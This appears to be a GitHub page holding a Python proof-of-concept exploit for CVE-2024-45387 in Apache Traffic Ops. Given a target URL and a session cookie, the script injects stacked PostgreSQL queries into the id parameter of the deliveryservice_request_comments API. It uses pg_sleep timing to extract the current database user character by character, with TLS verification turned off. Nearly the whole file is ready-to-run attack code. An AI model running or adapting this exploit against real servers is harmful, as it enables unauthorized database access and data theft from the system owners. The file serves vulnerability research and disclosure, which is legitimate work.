-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2024-45387-PoC.py
79 lines (60 loc) · 2.51 KB
/
CVE-2024-45387-PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/python3
import requests
import argparse
import logging
from string import printable
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description="Apache Traffic Ops SQL Injection PoC")
parser.add_argument('--url', required=True, help="Target URL")
parser.add_argument('--cookie', required=True, help="Cookie value for authentication")
parser.add_argument('--debug', action='store_true', help="Enable debug logging")
return parser.parse_args()
def strip_trailing_slash(url):
if url.endswith('/'):
return url[:-1]
return url
def setup_logging(debug):
log_level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
def get_length(url, cookie):
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
for i in range(15):
payload = f'%3bSELECT CASE WHEN (length(current_user) = {i}) THEN pg_sleep(3) ELSE pg_sleep(0) END'
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
return i
def get_current_user(url, cookie):
user = ''
for i in range(1, get_length(url, cookie) + 1):
for x in printable:
data = {
"deliveryServiceRequestId": 2,
"value": "SQLI Test"
}
headers = {
"Cookie": cookie
}
payload = f"%3bSELECT CASE WHEN (substring(current_user FROM {i} FOR 1) = '{x}') THEN pg_sleep(3) ELSE pg_sleep(0) END"
resp = requests.put(url + '/api/5.0/deliveryservice_request_comments?id=1' + payload, verify=False, json=data, headers=headers)
logging.debug(f"Payload: {payload} - Response Time: {resp.elapsed.seconds} seconds")
if resp.elapsed.seconds >= 3:
user += x
logging.info(f"Identified Character for Position {i}: {x}")
break
logging.info(f"Identified Current User: {user}")
def main():
args = parse_args()
setup_logging(args.debug)
url = strip_trailing_slash(args.url)
get_current_user(url, args.cookie)
if __name__ == "__main__":
main()